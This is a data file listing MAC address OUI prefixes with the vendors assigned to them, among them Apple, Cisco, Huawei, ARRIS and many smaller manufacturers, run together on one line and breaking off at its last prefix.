A87C01 Samsung Electronics Co.,Ltd B0D09C Samsung Electronics Co.,Ltd 50C8E5 Samsung Electronics Co.,Ltd 0020D4 Cabletron Systems, Inc. 00E03A Cabletron Systems, Inc. 0010E7 Breezecom, Ltd. 9492BC SYNTECH(HK) TECHNOLOGY LIMITED 001D19 Arcadyan Technology Corporation 0012BF Arcadyan Technology Corporation 507E5D Arcadyan Technology Corporation 7C4FB5 Arcadyan Technology Corporation 00223F NETGEAR 000FB5 NETGEAR 00095B NETGEAR 001A4F AVM GmbH 001C4A AVM GmbH 00150C AVM GmbH 0026FF BlackBerry RTS A4E4B8 BlackBerry RTS 003067 BIOSTAR Microtech Int'l Corp. F40B93 BlackBerry RTS 1C69A5 BlackBerry RTS 94EBCD BlackBerry RTS 28C68E NETGEAR 04A151 NETGEAR F87394 NETGEAR 204E7F NETGEAR C03F0E NETGEAR 0026F2 NETGEAR 00138F Asiarock Technology Limited 803773 NETGEAR A42B8C NETGEAR CC7D37 ARRIS Group, Inc. A47AA4 ARRIS Group, Inc. 001700 ARRIS Group, Inc. 0016B5 ARRIS Group, Inc. 0015A8 ARRIS Group, Inc. 00159A ARRIS Group, Inc. 001180 ARRIS Group, Inc. 000B06 ARRIS Group, Inc. 00D088 ARRIS Group, Inc. 00128A ARRIS Group, Inc. 002375 ARRIS Group, Inc. 0023A3 ARRIS Group, Inc. 001ADB ARRIS Group, Inc. 001F7E ARRIS Group, Inc. 0011AE ARRIS Group, Inc. 94CCB9 ARRIS Group, Inc. 3C438E ARRIS Group, Inc. 0024C1 ARRIS Group, Inc. 0025F2 ARRIS Group, Inc. 0025F1 ARRIS Group, Inc. 001404 ARRIS Group, Inc. 001AAD ARRIS Group, Inc. 0026BA ARRIS Group, Inc. 00230B ARRIS Group, Inc. 74E7C6 ARRIS Group, Inc. 001C12 ARRIS Group, Inc. 5C338E Alpha Networks Inc. 000941 Allied Telesis R&D Center K.K. 28E347 Liteon Technology Corporation 446D57 Liteon Technology Corporation 9CB70D Liteon Technology Corporation 68A3C4 Liteon Technology Corporation 70F1A1 Liteon Technology Corporation 8400D2 Sony Mobile Communications Inc 303926 Sony Mobile Communications Inc 00EB2D Sony Mobile Communications Inc B4527D Sony Mobile Communications Inc 00D9D1 Sony Interactive Entertainment Inc. B00594 Liteon Technology Corporation EC086B TP-LINK TECHNOLOGIES CO.,LTD. 94A1A2 AMPAK Technology, Inc. 00014A Sony Corporation 001EDC Sony Mobile Communications Inc 001D28 Sony Mobile Communications Inc 001813 Sony Mobile Communications Inc 402BA1 Sony Mobile Communications Inc 983B16 AMPAK Technology, Inc. 409558 Aisino Corporation 182861 AirTies Wireless Networks 6C71D9 AzureWave Technology Inc. D0E782 AzureWave Technology Inc. 6CADF8 AzureWave Technology Inc. A81D16 AzureWave Technology Inc. 34C3D2 FN-LINK TECHNOLOGY LIMITED 54F6C5 FUJIAN STAR-NET COMMUNICATION CO.,LTD D0D412 ADB Broadband Italia 0026B8 Actiontec Electronics, Inc 0026FC AcSiP Technology Corp. 0015AF AzureWave Technology Inc. 74F06D AzureWave Technology Inc. 44D832 AzureWave Technology Inc. E0B9A5 AzureWave Technology Inc. 781881 AzureWave Technology Inc. B046FC MitraStar Technology Corp. E04136 MitraStar Technology Corp. 001CA2 ADB Broadband Italia 002233 ADB Broadband Italia 3039F2 ADB Broadband Italia 0017C2 ADB Broadband Italia 689C5E AcSiP Technology Corp. 9C0E4A Shenzhen Vastking Electronic Co.,Ltd. A85840 Cambridge Industries(Group) Co.,Ltd. A0D37A Intel Corporate 8896F2 Valeo Schalter und Sensoren GmbH 001073 TECHNOBOX, INC. 20934D FUJIAN STAR-NET COMMUNICATION CO.,LTD 009027 Intel Corporation C48508 Intel Corporate 6805CA Intel Corporate 247703 Intel Corporate 74E50B Intel Corporate B80305 Intel Corporate 00A0C9 Intel Corporation 141877 Dell Inc. E09796 HUAWEI TECHNOLOGIES CO.,LTD 1C4024 Dell Inc. 18FB7B Dell Inc. F8B156 Dell Inc. 141AA3 Motorola Mobility LLC, a Lenovo Company 3407FB Ericsson AB A4A1C2 Ericsson AB 00065B Dell Inc. 842B2B Dell Inc. F04DA2 Dell Inc. E0DB55 Dell Inc. 000F1F Dell Inc. 24B6FD Dell Inc. 74E6E2 Dell Inc. 34E6D7 Dell Inc. 001EC9 Dell Inc. 002170 Dell Inc. 00219B Dell Inc. B8AC6F Dell Inc. 8CA982 Intel Corporate BC7737 Intel Corporate 1430C6 Motorola Mobility LLC, a Lenovo Company D8FC93 Intel Corporate D4AE52 Dell Inc. 28162E 2Wire Inc F81897 2Wire Inc 94C150 2Wire Inc 5CF821 Texas Instruments 88074B LG Electronics (Mobile Communications) 000D72 2Wire Inc 001288 2Wire Inc 00789E Sagemcom Broadband SAS E8BE81 Sagemcom Broadband SAS 681590 Sagemcom Broadband SAS F4EB38 Sagemcom Broadband SAS 001BBF Sagemcom Broadband SAS 002569 Sagemcom Broadband SAS 141FBA IEEE Registration Authority 807B85 IEEE Registration Authority CC1BE0 IEEE Registration Authority F40E11 IEEE Registration Authority 10F681 vivo Mobile Communication Co., Ltd. 00217C 2Wire Inc 001FB3 2Wire Inc 002275 Belkin International Inc. 0057D2 Cisco Systems, Inc 3C6716 Lily Robotics 00D0BD Lattice Semiconductor Corp. (LPA) 001F3A Hon Hai Precision Ind. Co.,Ltd. C8A030 Texas Instruments 78C5E5 Texas Instruments 0CFD37 SUSE Linux GmbH 2C228B CTR SRL 0C6F9C Shaw Communications Inc. 0017E4 Texas Instruments 04E451 Texas Instruments 505663 Texas Instruments 883314 Texas Instruments 647BD4 Texas Instruments D8952F Texas Instruments B8FFFE Texas Instruments 2CE412 Sagemcom Broadband SAS 44C15C Texas Instruments 0022A5 Texas Instruments E043DB Shenzhen ViewAt Technology Co.,Ltd. 3CCF5B ICOMM HK LIMITED 2405F5 Integrated Device Technology (Malaysia) Sdn. Bhd. 3C3556 Cognitec Systems GmbH 3C9066 SmartRG, Inc. 000D88 D-Link Corporation 001195 D-Link Corporation 001346 D-Link Corporation 78E3B5 Hewlett Packard 78ACC0 Hewlett Packard 68B599 Hewlett Packard 1CC1DE Hewlett Packard B8A386 D-Link International 1C7EE5 D-Link International 1CBDB9 D-Link International 00142F Savvius 28BC18 SourcingOverseas Co. Ltd 94ABDE OMX Technology - FZE 9CDFB1 Shenzhen Crave Communication Co., LTD ACCF85 HUAWEI TECHNOLOGIES CO.,LTD 3871DE Apple, Inc. 7081EB Apple, Inc. 00738D Shenzhen TINNO Mobile Technology Corp. 34BA75 Everest Networks, Inc 7C18CD E-TRON Co.,Ltd. 00E0FC HUAWEI TECHNOLOGIES CO.,LTD 6416F0 HUAWEI TECHNOLOGIES CO.,LTD F40304 Google, Inc. 546009 Google, Inc. A47733 Google, Inc. 807ABF HTC Corporation 78F882 LG Electronics (Mobile Communications) C02C7A Shenzhen Horn Audio Co.,Ltd. 1CCB99 TCT mobile ltd A42BB0 TP-LINK TECHNOLOGIES CO.,LTD. 188B45 Cisco Systems, Inc 606944 Apple, Inc. B0C69A Juniper Networks 2C6BF5 Juniper Networks C42F90 Hangzhou Hikvision Digital Technology Co.,Ltd. F4CA24 FreeBit Co., Ltd. 00D0B7 Intel Corporation 001DD6 ARRIS Group, Inc. 903EAB ARRIS Group, Inc. 306023 ARRIS Group, Inc. 14ABF0 ARRIS Group, Inc. 0014F6 Juniper Networks 901ACA ARRIS Group, Inc. C83FB4 ARRIS Group, Inc. E0B70A ARRIS Group, Inc. 001DCE ARRIS Group, Inc. 0013E8 Intel Corporate 0013CE Intel Corporate 2C768A Hewlett Packard C8348E Intel Corporate 4C3488 Intel Corporate 1002B5 Intel Corporate 004026 BUFFALO.INC 4CE676 BUFFALO.INC 000BCD Hewlett Packard 000F20 Hewlett Packard 00110A Hewlett Packard B8B81E Intel Corporate B46D83 Intel Corporate 000E35 Intel Corporation 0007E9 Intel Corporation 001708 Hewlett Packard 0017A4 Hewlett Packard C005C2 ARRIS Group, Inc. 0030C1 Hewlett Packard 0080A0 Hewlett Packard D48564 Hewlett Packard 24BE05 Hewlett Packard FC3FDB Hewlett Packard 308D99 Hewlett Packard 5820B1 Hewlett Packard 9457A5 Hewlett Packard 000EB3 Hewlett Packard 080009 Hewlett Packard 90CDB6 Hon Hai Precision Ind. Co.,Ltd. 40490F Hon Hai Precision Ind. Co.,Ltd. 00265C Hon Hai Precision Ind. Co.,Ltd. 002269 Hon Hai Precision Ind. Co.,Ltd. D87988 Hon Hai Precision Ind. Co.,Ltd. 74A78E zte corporation 00092D HTC Corporation 443192 Hewlett Packard A0D3C1 Hewlett Packard 38EAA7 Hewlett Packard AC162D Hewlett Packard 80C16E Hewlett Packard B4B52F Hewlett Packard D07E28 Hewlett Packard D0BF9C Hewlett Packard 7C6193 HTC Corporation 90E7C4 HTC Corporation BCEAFA Hewlett Packard 7446A0 Hewlett Packard 2C44FD Hewlett Packard 0453D5 Sysorex Global Holdings EC52DC WORLD MEDIA AND TECHNOLOGY Corp. 94B2CC PIONEER CORPORATION 0452F3 Apple, Inc. 88C255 Texas Instruments CC78AB Texas Instruments 1C7839 Shenzhen Tencent Computer System Co., Ltd. FCD733 TP-LINK TECHNOLOGIES CO.,LTD. 5C899A TP-LINK TECHNOLOGIES CO.,LTD. A81B5A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 2C5BB8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 08EB74 HUMAX Co., Ltd. E005C5 TP-LINK TECHNOLOGIES CO.,LTD. 388345 TP-LINK TECHNOLOGIES CO.,LTD. EC888F TP-LINK TECHNOLOGIES CO.,LTD. 6466B3 TP-LINK TECHNOLOGIES CO.,LTD. 2832C5 HUMAX Co., Ltd. F0F336 TP-LINK TECHNOLOGIES CO.,LTD. BC4699 TP-LINK TECHNOLOGIES CO.,LTD. F483CD TP-LINK TECHNOLOGIES CO.,LTD. 002127 TP-LINK TECHNOLOGIES CO.,LTD. 5C63BF TP-LINK TECHNOLOGIES CO.,LTD. 142D27 Hon Hai Precision Ind. Co.,Ltd. 88E3AB HUAWEI TECHNOLOGIES CO.,LTD C40528 HUAWEI TECHNOLOGIES CO.,LTD 3CDFBD HUAWEI TECHNOLOGIES CO.,LTD 509F27 HUAWEI TECHNOLOGIES CO.,LTD 80717A HUAWEI TECHNOLOGIES CO.,LTD 0021E8 Murata Manufacturing Co., Ltd. 000E6D Murata Manufacturing Co., Ltd. 902106 BSkyB Ltd D02788 Hon Hai Precision Ind. Co.,Ltd. 904CE5 Hon Hai Precision Ind. Co.,Ltd. 001FE2 Hon Hai Precision Ind. Co.,Ltd. 0016CF Hon Hai Precision Ind. Co.,Ltd. 2002AF Murata Manufacturing Co., Ltd. 98F537 zte corporation 5C4CA9 HUAWEI TECHNOLOGIES CO.,LTD F4C714 HUAWEI TECHNOLOGIES CO.,LTD 286ED4 HUAWEI TECHNOLOGIES CO.,LTD 001E10 HUAWEI TECHNOLOGIES CO.,LTD D47856 Avaya Inc D842AC Shanghai Feixun Communication Co.,Ltd. 5439DF HUAWEI TECHNOLOGIES CO.,LTD 283CE4 HUAWEI TECHNOLOGIES CO.,LTD 2CF4C5 Avaya Inc 3C3A73 Avaya Inc FC8399 Avaya Inc 587F66 HUAWEI TECHNOLOGIES CO.,LTD 64A651 HUAWEI TECHNOLOGIES CO.,LTD 086361 HUAWEI TECHNOLOGIES CO.,LTD A01290 Avaya Inc 38BB3C Avaya Inc F873A2 Avaya Inc CCF954 Avaya Inc 8C34FD HUAWEI TECHNOLOGIES CO.,LTD ACF7F3 Xiaomi Communications Co Ltd D4970B Xiaomi Communications Co Ltd 8CBEBE Xiaomi Communications Co Ltd 14F65A Xiaomi Communications Co Ltd 009EC8 Xiaomi Communications Co Ltd 0C1DAF Xiaomi Communications Co Ltd 0819A6 HUAWEI TECHNOLOGIES CO.,LTD 3CF808 HUAWEI TECHNOLOGIES CO.,LTD 486276 HUAWEI TECHNOLOGIES CO.,LTD B41513 HUAWEI TECHNOLOGIES CO.,LTD AC4E91 HUAWEI TECHNOLOGIES CO.,LTD 283152 HUAWEI TECHNOLOGIES CO.,LTD 3480B3 Xiaomi Communications Co Ltd F48B32 Xiaomi Communications Co Ltd 009021 Cisco Systems, Inc 0090B1 Cisco Systems, Inc 001AB6 Texas Instruments 0012D1 Texas Instruments 001237 Texas Instruments A0E6F8 Texas Instruments 70FF76 Texas Instruments D03972 Texas Instruments 5C313E Texas Instruments F4B85E Texas Instruments 68C90B Texas Instruments 74882A HUAWEI TECHNOLOGIES CO.,LTD 4CB16C HUAWEI TECHNOLOGIES CO.,LTD 04BD70 HUAWEI TECHNOLOGIES CO.,LTD D4F513 Texas Instruments 507224 Texas Instruments 0090D9 Cisco Systems, Inc 009092 Cisco Systems, Inc 00102F Cisco Systems, Inc 00100D Cisco Systems, Inc 001007 Cisco Systems, Inc 001014 Cisco Systems, Inc 0090BF Cisco Systems, Inc 0050D1 Cisco Systems, Inc 1CE6C7 Cisco Systems, Inc CCD539 Cisco Systems, Inc 4C0082 Cisco Systems, Inc 7C95F3 Cisco Systems, Inc 34DBFD Cisco Systems, Inc 885A92 Cisco Systems, Inc 00400B Cisco Systems, Inc 006070 Cisco Systems, Inc 500604 Cisco Systems, Inc 00E01E Cisco Systems, Inc 00112F ASUSTek COMPUTER INC. 001BFC ASUSTek COMPUTER INC. A0554F Cisco Systems, Inc 204C9E Cisco Systems, Inc 84B802 Cisco Systems, Inc B0AA77 Cisco Systems, Inc BCC493 Cisco Systems, Inc A46C2A Cisco Systems, Inc D0A5A6 Cisco Systems, Inc 3C5EC3 Cisco Systems, Inc 64F69D Cisco Systems, Inc 000389 PLANTRONICS, INC. D072DC Cisco Systems, Inc 28C7CE Cisco Systems, Inc F40F1B Cisco Systems, Inc F8C288 Cisco Systems, Inc 1C6A7A Cisco Systems, Inc 001EE5 Cisco-Linksys, LLC 484487 Cisco SPVTG 38C85C Cisco SPVTG 485B39 ASUSTek COMPUTER INC. BCAEC5 ASUSTek COMPUTER INC. 10BF48 ASUSTek COMPUTER INC. 5067AE Cisco Systems, Inc F09E63 Cisco Systems, Inc 6C9989 Cisco Systems, Inc 18E728 Cisco Systems, Inc 001217 Cisco-Linksys, LLC 001310 Cisco-Linksys, LLC 046C9D Cisco Systems, Inc 84B261 Cisco Systems, Inc E448C7 Cisco SPVTG 00101F Cisco Systems, Inc 54A274 Cisco Systems, Inc 60FB42 Apple, Inc. 64B9E8 Apple, Inc. 001D4F Apple, Inc. 002312 Apple, Inc. 80E01D Cisco Systems, Inc D8A25E Apple, Inc. 000A27 Apple, Inc. 183451 Apple, Inc. 0C771A Apple, Inc. 286ABA Apple, Inc. 4CB199 Apple, Inc. C09F42 Apple, Inc. D023DB Apple, Inc. 70DEE2 Apple, Inc. F0CBA1 Apple, Inc. 182032 Apple, Inc. 403CFC Apple, Inc. 4860BC Apple, Inc. 3451C9 Apple, Inc. 406C8F Apple, Inc. 5855CA Apple, Inc. DC2B61 Apple, Inc. 40A6D9 Apple, Inc. 60FACD Apple, Inc. 003EE1 Apple, Inc. FC253F Apple, Inc. 04F7E4 Apple, Inc. 34C059 Apple, Inc. F0D1A9 Apple, Inc. 705681 Apple, Inc. 14109F Apple, Inc. 040CCE Apple, Inc. 54EAA8 Apple, Inc. 28E14C Apple, Inc. E4C63D Apple, Inc. 54E43A Apple, Inc. 04DB56 Apple, Inc. AC3C0B Apple, Inc. 701124 Apple, Inc. 042665 Apple, Inc. EC3586 Apple, Inc. 78FD94 Apple, Inc. 2CBE08 Apple, Inc. E8802E Apple, Inc. 006171 Apple, Inc. 8C7C92 Apple, Inc. B03495 Apple, Inc. F437B7 Apple, Inc. AC7F3E Apple, Inc. 280B5C Apple, Inc. ACFDEC Apple, Inc. DC9B9C Apple, Inc. 54724F Apple, Inc. D8CF9C Apple, Inc. 7C6DF8 Apple, Inc. 04E536 Apple, Inc. A8BBCF Apple, Inc. 6C4008 Apple, Inc. FCA386 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 40331A Apple, Inc. CCC760 Apple, Inc. BC4CC4 Apple, Inc. DC3714 Apple, Inc. 20A2E4 Apple, Inc. 28F076 Apple, Inc. 141357 ATP Electronics, Inc. B8B2EB Googol Technology (HK) Limited FCCF43 HUIZHOU CITY HUIYANG DISTRICT MEISIQI INDUSTRY DEVELOPMENT CO,.LTD D848EE Hangzhou Xueji Technology Co., Ltd. B4EF04 DAIHAN Scientific Co., Ltd. A4DEC9 QLove Mobile Intelligence Information Technology (W.H.) Co. Ltd. CCE0C3 EXTEN Technologies, Inc. 646A74 AUTH-SERVERS, LLC 4C8ECC SILKAN SA E435C8 HUAWEI TECHNOLOGIES CO.,LTD 0C54B9 Nokia 84100D Motorola Mobility LLC, a Lenovo Company D00F6D T&W Electronics Company 908D78 D-Link International 7C7176 Wuxi iData Technology Company Ltd. 7C0191 Apple, Inc. 2C1BC8 Hunan Topview Network System CO.,LTD A8474A Hon Hai Precision Ind. Co.,Ltd. C40049 Kamama 80D605 Apple, Inc. 98E848 Axiim 4040A7 Sony Mobile Communications Inc C04A09 Zhejiang Everbright Communication Equip. Co,. Ltd A01E0B MINIX Technology Limited 68E8EB Linktel Technologies Co.,Ltd A845CD Siselectron Technology LTD. D0C193 SKYBELL, INC AC6462 zte corporation C025A2 NEC Platforms, Ltd. 48137E Samsung Electronics Co.,Ltd 30F772 Hon Hai Precision Ind. Co.,Ltd. DC3CF6 Atomic Rules LLC 089B4B iKuai Networks 4473D6 Logitech 10CC1B Liverock technologies,INC E80734 Champion Optical Network Engineering, LLC A43831 RF elements s.r.o. 380546 Foctek Photonics, Inc. D48304 SHENZHEN FAST TECHNOLOGIES CO.,LTD DC2B2A Apple, Inc. 9C8DD3 Leonton Technologies E41A2C ZPE Systems, Inc. E8BDD1 HUAWEI TECHNOLOGIES CO.,LTD F41535 SPON Communication Technology Co.,Ltd 380AAB Formlabs 382DE8 Samsung Electronics Co.,Ltd C08997 Samsung Electronics Co.,Ltd A815D6 Shenzhen Meione Technology CO., LTD C07CD1 PEGATRON CORPORATION 90D8F3 zte corporation D445E8 Jiangxi Hongpai Technology Co., Ltd. 342606 CarePredict, Inc. 38B725 Wistron Infocomm (Zhongshan) Corporation ACEC80 ARRIS Group, Inc. 507B9D LCFC(HeFei) Electronics Technology co., ltd 6C7220 D-Link International 30A243 Shenzhen Prifox Innovation Technology Co., Ltd. 380195 Samsung Electronics Co.,Ltd 246E96 Dell Inc. 44975A SHENZHEN FAST TECHNOLOGIES CO.,LTD 5045F7 Liuhe Intelligence Technology Ltd. AC676F Electrocompaniet A.S. 640DE6 Petra Systems E0553D Cisco Meraki FC335F Polyera 84D4C8 Widex A/S EC21E5 Toshiba 04C23E HTC Corporation E01AEA Allied Telesis, Inc. 28B9D9 Radisys Corporation F4C613 Alcatel-Lucent Shanghai Bell Co., Ltd 445F8C Intercel Group Limited B88981 Chengdu InnoThings Technology Co., Ltd. F02624 WAFA TECHNOLOGIES CO., LTD. F8F464 Rawe Electonic GmbH 5C5188 Motorola Mobility LLC, a Lenovo Company EC0133 TRINUS SYSTEMS INC. 2CC548 IAdea Corporation 14DDA9 ASUSTek COMPUTER INC. 184F32 Hon Hai Precision Ind. Co.,Ltd. DCA3AC RBcloudtech 0CE725 Microsoft Corporation 58F102 BLU Products Inc. B4AE2B Microsoft 949F3E Sonos, Inc. 3089D3 HONGKONG UCLOUDLINK NETWORK TECHNOLOGY LIMITED 5CB395 HUAWEI TECHNOLOGIES CO.,LTD 906CAC Fortinet, Inc. 3CDA2A zte corporation 842E27 Samsung Electronics Co.,Ltd 1CADD1 Bosung Electronics Co., Ltd. 082CB0 Network Instruments A013CB Fiberhome Telecommunication Technologies Co.,LTD D00492 Fiberhome Telecommunication Technologies Co.,LTD 1432D1 Samsung Electronics Co.,Ltd 1816C9 Samsung Electronics Co.,Ltd 00FC8D Hitron Technologies. Inc 84DF19 Chuango Security Technology Corporation DC15DB Ge Ruili Intelligent Technology ( Beijing ) Co., Ltd. E0DB10 Samsung Electronics Co.,Ltd 546172 ZODIAC AEROSPACE SAS EC60E0 AVI-ON LABS B46D35 Dalian Seasky Automation Co;Ltd 3CA31A Oilfind International LLC 30F335 HUAWEI TECHNOLOGIES CO.,LTD E8F2E3 Starcor Beijing Co.,Limited 6459F8 Vodafone Omnitel B.V. 6C4418 Zappware A8D409 USA 111 Inc 6C4598 Antex Electronic Corp. 68A378 FREEBOX SAS 340A22 TOP-ACCESS ELECTRONICS CO LTD E866C4 Diamanti D4D7A9 Shanghai Kaixiang Info Tech LTD 343D98 JinQianMao Technology Co.,Ltd. F44713 Leading Public Performance Co., Ltd. 5CA178 TableTop Media (dba Ziosk) 9CBEE0 Biosoundlab Co., Ltd. 0C413E Microsoft Corporation D06F4A TOPWELL INTERNATIONAL HOLDINGS LIMITED 0492EE iway AG 807459 K's Co.,Ltd. 601970 HUIZHOU QIAOXING ELECTRONICS TECHNOLOGY CO., LTD. A408EA Murata Manufacturing Co., Ltd. B87879 Roche Diagnostics GmbH D083D4 Xtel Wireless ApS 08D34B Techman Electronics (Changshu) Co., Ltd. 78A351 SHENZHEN ZHIBOTONG ELECTRONICS CO.,LTD E4695A Dictum Health, Inc. 7C7A53 Phytrex Technology Corp. 107873 Shenzhen Jinkeyi Communication Co., Ltd. 48EE0C D-Link International EC3C88 MCNEX Co.,Ltd. 70AD54 Malvern Instruments Ltd 9000DB Samsung Electronics Co.,Ltd B4EF39 Samsung Electronics Co.,Ltd F02A23 Creative Next Design 584704Shenzhen Webridge Technology Co.,Ltd 74A063 HUAWEI TECHNOLOGIES CO.,LTD ECE2FD SKG Electric Group(Thailand) Co., Ltd. 148F21 Garmin International 9C685B Octonion SA 7C534A Metamako BC6E64 Sony Mobile Communications Inc BCB308 HONGKONG RAGENTEK COMMUNICATION TECHNOLOGY CO.,LIMITED 6C2E72 B&B EXPORTING LIMITED 5CCCFF Techroutes Network Pvt Ltd 90C35F Nanjing Jiahao Technology Co., Ltd. C808E9 LG Electronics 183A2D Samsung Electronics Co.,Ltd EC74BA Hirschmann Automation and Control GmbH FC3288 CELOT Wireless Co., Ltd D87495 zte corporation 5C3B35 Gehirn Inc. E4FED9 EDMI Europe Ltd 5CF7C3 SYNTECH (HK) TECHNOLOGY LIMITED 9CE230 JULONG CO,.LTD. 5C41E7 Wiatec International Ltd. 344CA4 amazipoint technology Ltd. A8F038 SHEN ZHEN SHI JIN HUA TAI ELECTRONICS CO.,LTD ACC73F VITSMO CO., LTD. 44356F Neterix 74E277 Vizmonet Pte Ltd 14893E VIXTEL TECHNOLOGIES LIMTED BC54F9 Drogoo Technology Co., Ltd. 78FC14 Family Zone Cyber Safety Ltd 3809A4 Firefly Integrations BCE767 QuanzhouTDX Electronics Co., Ltd FCAFAC Socionext Inc. BC4DFB Hitron Technologies. Inc 2C337A Hon Hai Precision Ind. Co.,Ltd. 84DDB7 Cilag GmbH International 08EFAB SAYME WIRELESS SENSOR NETWORK 7076FF KERLINK 1436C6 Lenovo Mobile Communication Technology Ltd. 68F728 LCFC(HeFei) Electronics Technology co., ltd 382C4A ASUSTek COMPUTER INC. 307350 Inpeco SA DCEC06 Heimi Network Technology Co., Ltd. CCBDD3 Ultimaker B.V. 8CE78C DK Networks 545146 AMG Systems Ltd. 8463D6 Microsoft Corporation EC13B2 Netonix 104E07 Shanghai Genvision Industries Co.,Ltd 049B9C EadingcoreIntelligent Technology Co., Ltd. 842690 BEIJING THOUGHT SCIENCE CO.,LTD. 801967 Shanghai Reallytek Information TechnologyCo.,Ltd 2CF7F1 Seeed Technology Inc. 3C1E13 HANGZHOU SUNRISE TECHNOLOGY CO., LTD 08115E Bitel Co., Ltd. 0881BC HongKong Ipro Technology Co., Limited C09879 Acer Inc. B84FD5 Microsoft Corporation D84A87 OI ELECTRIC CO.,LTD F03D29 Actility 88708C Lenovo Mobile Communication Technology Ltd. 5014B5 Richfit Information Technology Co., Ltd CC3F1D Intesis Software SL DCDA4F GETCK TECHNOLOGY,INC 101218 Korins Inc. 3428F0 ATN International Limited CC10A3 Beijing Nan Bao Technology Co., Ltd. 5CAAFD Sonos, Inc. 14EDE4 Kaiam Corporation D01242 BIOS Corporation 603696 The Sapling Company 54FFCF Mopria Alliance F4F26D TP-LINK TECHNOLOGIES CO.,LTD. 404EEB Higher Way Electronic Co., Ltd. C456FE Lava International Ltd. ACB74F METEL s.r.o. C0EEFB OnePlus Tech (Shenzhen) Ltd 304225 BURG-WÄCHTER KG FCDBB3 Murata Manufacturing Co., Ltd. CCF538 3isysnetworks B8BD79 TrendPoint Systems 74F413 Maxwell Forest A00627 NEXPA System 303335 Boosty 44746C Sony Mobile Communications Inc 4C9EFF Zyxel Communications Corporation BC9CC5 Beijing Huafei Technology Co., Ltd. 5CB8CB Allis Communications 34F0CA Shenzhen Linghangyuan Digital Technology Co.,Ltd. 70720D Lenovo Mobile Communication Technology Ltd. 3CCD5A Technische Alternative GmbH FCAA14 GIGA-BYTE TECHNOLOGY CO.,LTD. 94D60E shenzhen yunmao information technologies co., ltd 748F4D MEN Mikro Elektronik GmbH 506787 Planet Networks 8CBF9D Shanghai Xinyou Information Technology Ltd. Co. 9CAD97 Hon Hai Precision Ind. Co.,Ltd. 882950 Netmoon Technology Co., Ltd 7CE524 Quirky, Inc. F4D261 SEMOCON Co., Ltd 48D855 Telvent 08F728 GLOBO Multimedia Sp. z o.o. Sp.k. 206E9C Samsung Electronics Co.,Ltd 6C2F2C Samsung Electronics Co.,Ltd B009D3 Avizia 60C1CB Fujian Great Power PLC Equipment Co.,Ltd BC25F0 3D Display Technologies Co., Ltd. C03D46 Shanghai Sango Network Technology Co.,Ltd 64EAC5 SiboTech Automation Co., Ltd. 30F7D7 Thread Technology Co., Ltd 18227E Samsung Electronics Co.,Ltd 30C7AE Samsung Electronics Co.,Ltd 44D4E0 Sony Mobile Communications Inc FCD5D9 Shenzhen SDMC Technology Co., Ltd. 74DA38 Edimax Technology Co. Ltd. E4F4C6 NETGEAR CCA0E5 DZG Metering GmbH 60812B Custom Control Concepts 1C1CFD Dalian Hi-Think Computer Technology, Corp 90AE1B TP-LINK TECHNOLOGIES CO.,LTD. 60E327 TP-LINK TECHNOLOGIES CO.,LTD. 48D18E Metis Communication Co.,Ltd F86601 Suzhou Chi-tek information technology Co., Ltd 145645 Savitech Corp. 7062B8 D-Link International ACA919 TrekStor GmbH B025AA Private D4B43E Messcomp Datentechnik GmbH 94C014 Sorter Sp. j. Konrad Grzeszczyk MichaA, Ziomek 9CFBF1 MESOMATIC GmbH & Co.KG 1027BE TVIP 2087AC AES motomation 709383 Intelligent Optical Network High Tech CO.,LTD. 80D433 LzLabs GmbH B0DA00 CERA ELECTRONIQUE 1CAB01 Innovolt D8B6D6 Blu Tether Limited 6C2C06 OOO NPP Systemotechnika-NN C4913A Shenzhen Sanland Electronic Co., ltd. 68856A OuterLink Corporation 9451BF Hyundai ESG F015A0 KyungDong One Co., Ltd. C44E1F BlueN B0869E Chloride S.r.L D057A1 Werma Signaltechnik GmbH & Co. KG B4B542 Hubbell Power Systems, Inc. 54CDEE ShenZhen Apexis Electronic Co.,Ltd 88E8F8 YONG TAI ELECTRONIC (DONGGUAN) LTD. 909864 Impex-Sat GmbH&Co KG DCE578 Experimental Factory of Scientific Engineering and Special Design Department D86595 Toy's Myth Inc. F4B52F Juniper Networks C0F79D Powercode C4C919 Energy Imports Ltd 38F098 Vapor Stone Rail Systems 64E892 Morio Denki Co., Ltd. D8DD5F BALMUDA Inc. D86194 Objetivos y Sevicios de Valor Añadido E8FC60 ELCOM Innovations Private Limited 589CFC FreeBSD Foundation 702C1F Wisol C8D429 Muehlbauer AG F85C45 IC Nexus Co. Ltd. ACE069 ISAAC Instruments 30B5C2 TP-LINK TECHNOLOGIES CO.,LTD. E07F53 TECHBOARD SRL 48FEEA HOMA B.V. E8EA6A StarTech.com 04DB8A Suntech International Ltd. 90DFB7 s.m.s smart microwave sensors GmbH 085700 TP-LINK TECHNOLOGIES CO.,LTD. FC27A2 TRANS ELECTRIC CO., LTD. FCBBA1 Shenzhen Minicreate Technology Co.,Ltd F08A28 JIANGSU HENGSION ELECTRONIC S and T CO.,LTD 28BB59 RNET Technologies, Inc. 242642 SHARP Corporation. 34DE34 zte corporation FC1607 Taian Technology(Wuxi) Co.,Ltd. AC02CA HI Solutions, Inc. 746F3D Contec GmbH 4C0DEE JABIL CIRCUIT (SHANGHAI) LTD. D0634D Meiko Maschinenbau GmbH & Co. KG 008B43 RFTECH 8C41F2 RDA Technologies Ltd. E036E3 Stage One International Co., Ltd. DC052F National Products Inc. D0BD01 DS International 8CDE99 Comlab Inc. 4CE1BB Zhuhai HiFocus Technology Co., Ltd. 24A87D Panasonic Automotive Systems Asia Pacific(Thailand)Co.,Ltd. EC71DB Shenzhen Baichuan Digital Technology Co., Ltd. A409CB Alfred Kaercher GmbH & Co KG 8C569D Imaging Solutions Group 40B6B1 SUNGSAM CO,.Ltd 84FE9E RTC Industries, Inc. FC4B1C INTERSENSOR S.R.L. 403067 Conlog (Pty) Ltd E86183 Black Diamond Advanced Technology, LLC 38C9A9 SMART High Reliability Solutions, Inc. 501AC5 Microsoft B0989F LG CNS C0F1C4 Pacidal Corporation Ltd. 600347 Billion Electric Co. Ltd. F0D3A7 CobaltRay Co., Ltd 38A53C COMECER Netherlands 5CFFFF Shenzhen Kezhonglong Optoelectronic Technology Co., Ltd 085240 EbV Elektronikbau- und Vertriebs GmbH B8C1A2 Dragon Path Technologies Co., Limited 80F25E Kyynel 68692E Zycoo Co.,Ltd D46867 Neoventus Design Group 2C18AE Trend Electronics Co., Ltd. F81CE5 